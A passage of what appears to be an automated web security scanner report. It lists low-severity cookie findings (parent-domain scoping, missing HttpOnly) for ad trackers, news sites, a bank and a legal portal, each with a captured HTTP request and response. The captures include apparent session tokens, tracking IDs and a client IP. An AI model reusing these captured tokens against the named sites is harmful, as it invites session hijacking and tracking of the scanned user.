4v4W2G3qart9v0lUhUFtrwAgKmwYbDU6hcnQfk1tudLUowDkoLCasxWjkPLeTOwQyYfFRoGQ1P2wq9MRvhbae96eQc_QL8Y8Frg5X12BeQO3OjFTV291KS2RaPVPOOkGi1geUIVZG9OQnob9Bt0DOsV3G_HCir3Yg1skhTvQ4n3K65vFpt3xYbzFf8Q06hm-RooLiXjgmMQu3eHeZC5CTGrXgCx3rgAsBIoW_gNcvGPrpcTHNsQQMEhxzL-4TqRY8qS_hbJfkUANyjVcq-NSNhuTjXqndliQHUkRx6kaJj4rOszghpKbXwU

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:40 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=7069035459346560135&fpid=4&nu=n&t=
...[SNIP]...

13.82. http://segments.adap.tv/data/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=cadreon&type=gif&segment=11&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-10+06%3A15%3A14"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-12+04%3A39%3A28";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"9\":{\"f\":1307775600,\"e\":1307775600,\"s\":[528],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

13.83. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQ

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:03:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Thu, 10-May-2012 11:03:02 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQAY9hhTkJlZg; expires=Sat, 11-May-2013 11:03:02 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


13.84. http://tags.bluekai.com/site/668

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/668

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/668 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0naVHQtYBXyoKH/DT/hgGOa8FWhLeyudrGnydecPTsCovSQf81ev3XWaktOkAIOGRq3ydTvMa/xkZYesa9FEqXITObqR9LDpenZh4YRZJ/CnvRsS39mATrtxsDBVj7RBQcjQW9KkLCUQ==; bkw5=; bkst=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; bklc=4dcaa395; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bk=nlnE/1V5c/sVIHOf; bkc=KJh5pg6m9DWDOKYpxPCO/7oqIcA9JxAH2jRgYQgJgAKxvYun3vQAG+BRkUvMPbJHSp0OJ8O/pYUUfAyp12dzzpnMS19IYh0230Zmz1EivK8s9hIuQmXe+NlQtkyt85AJcUi/IEgA0PYt38Mbfczzv9b9N4E056Wh8578BB9oSqOSQj2kuvRXt6tJm6meUxNLM0sjXr0IVnRn/Oz0p57iv5Ha4NA8ZhcWFZT7jPrv3z2IjReKUzmGKeRBBnfrvvjItBH7btJttFh1d0cq12kBPpq+f92fxZzq; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 11:37:58 GMT
Set-Cookie: bklc=4dcbc695; expires=Sat, 14-May-2011 11:37:57 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 13 May 2011 11:37:58 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=JzUPJLV5c/sVIHOf; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5pM2nxkWRhdcFfxIoSYermUH+qcO111n8MGjeezv+k09ROnKi0uSCUvxkZhpalDALQISVUAeTYQvCXhiw28bpw/4wKUTdprkFy1XPwWl7Qx46MEXmqzX57tlaFMeMBxdMy4FS9XKuPyXp1OgO86FL0gN+0S+ES4QtIXKWqN3t/X4uP02lynIWfrlqtFrmJSdK06sM8asFhPTzRa70biCgfGGKTPcLXOgnAkzlpUMrxYaCtSFBDNHBdbWXYpqjUFA6RfFrVwg3lN6TddJGIfmQ0wcvez4uENgbbgEjEUgdkFI/ypFqJ8a+m5PdLuPlcQ==; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 11:37:58 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.85. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1; nyt-m=D5A6A596AEC66C101E6FF77DE512588B&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.11.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:15:57 GMT
Content-type: text/html
Set-cookie: adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:15:57 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Cache-Control: private
Content-Length: 70079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Private Equity News
...[SNIP]...

13.86. http://track.ft.com/track/track.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.ft.com
Path:   /track/track.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/track.js HTTP/1.1
Host: track.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Set-Cookie: FTUserTrack=173.193.214.243.1305198170970491; path=/; expires=Sun, 09-May-21 11:02:50 GMT; domain=.ft.com
Set-Cookie: AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; Domain=.ft.com; Path=/
Cache-Control: no-cache
Content-Length: 0
Date: Thu, 12 May 2011 11:02:50 GMT
Connection: Keep-Alive
Location: http://media.ft.com/null.js
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/0.9.7d
Content-Type: application/x-javascript
Pragma: no-cache


13.87. http://va.px.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: segments_p1="eJzjYuFo2czIxcWxZx+zwL/N596xAAAtYAZp"; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:49:38 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcWxZx+zwKX2K+9YACvmBhc=";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 11-May-2012 11:49:38 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


13.88. http://www.csscorp.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csscorp.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:11 GMT
Server: Apache/2.2.12 (Unix)
Set-Cookie: csscorp=173.193.214.243.1305201371350323; path=/; max-age=315360000; domain=.csscorp.com
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Global Information &
...[SNIP]...

13.89. http://www.nytimes.com/adx/bin/adx_remote.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /adx/bin/adx_remote.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/post&posall=XXL,TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Frame6A,Left2,Left3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Mergers+&+Acquisitions;Investment+Banking;I+PO;I.P.O.s;IPOs;Offerings;Private+Equity;Hedge+Funds;Venture+Capital;Legal;The+New+York+Times;Andrew+Ross+Sorkin;Andrew+Sorkin;+DealBook;deal+maker;Wall+street;wall+st.;Goldman+Sachs;Goldman+Sachs+Group;Morgan+Stanley;Morgan+Stanley+Smith+Barney;Citigroup;Citibank;Citi;Citicorp;Bank+of+America;Bank+of+America+Merrill+Lynch;Merrill+Lynch;Merrill;JPMorgan+Chase;J.P.+Morgan+Chase;J.+P.+Morgan+Chase;J.P.+Morgan+Securities;Bear+Stearns;Lehman+Brothers;Credit+Suisse;Credit+Suisse+First+Boston;CSFB;UBS;Deutsche+Bank;SAC+Capital;S.A.C.+Capital;Stevie+Cohen;Henry+Kravis;KKR;Kohlberg+Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;animal-kingdom;boston-celtics;carl-pascarella;churchill-downs;david-bonderman;detroit-pistons;kentucky-derby;new-york-mets-org;platinum-equity;private-equity;retailleisure;steven-a-cohen;team-valor-international;tom-gores;tpgtexas-pacific-group HTTP/1.1
Host: www.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; ebNewBandWidth_.www.nytimes.com=2534%3A1304378197383; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; _chartbeat2=sb4nmgc9whf8empd

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:02 GMT
Content-type: text/html
Set-cookie: adxcl=t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:03:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*192f7=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 22704


var adxads = new Array(11);

adxads[0] = "<img src=\"http://graphics8.nytimes.com/ads/blank.gif\">";
adxpos_Bottom7 = 0;

adxads[1] = "<script> function safeMultiTrack() { if ('dcsMultiTrack' in wind
...[SNIP]...

13.90. https://www.wellsfargo.com/jump/theprivatebank/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/theprivatebank/index

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/theprivatebank/index HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:07:47 GMT
Content-length: 8767
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=2YvRNL1DhnQJXpvqtrRMH62pV5nkJ3W9wswYr5TSXhRqMGc2yXqQ!-1621466656; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/
Content-Language: en-US
Set-Cookie: ISD_WCM_COOKIE=876747786.16927.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/javasc
...[SNIP]...

14. Cookie without HttpOnly flag set
There are 157 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



14.1. https://ams-legal.net/support/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /support/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/default.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ams-legal.com/services_and_support.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:27 GMT
Set-Cookie: ASPSESSIONIDQSCDBTRB=GJGHIDNBJPFJKBPOAGHLPKEK; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

14.2. https://ams-legal.net/tuckerellis/Image.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/Image.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/Image.asp?Name=login-bar.png HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/Login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBSASQD=NACKKCLBMLGHAKOHOFLAAKAL; path=/
Cache-control: private
Content-Length: 0


14.3. https://ams-legal.net/tuckerellis/Login.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/Login.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/Login.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2815
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:32 GMT
Set-Cookie: ASPSESSIONIDACBSASQD=DACKKCLBEDJNFIFEHJMOIFOI; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...

14.4. https://ams-legal.net/tuckerellis/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/default.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/
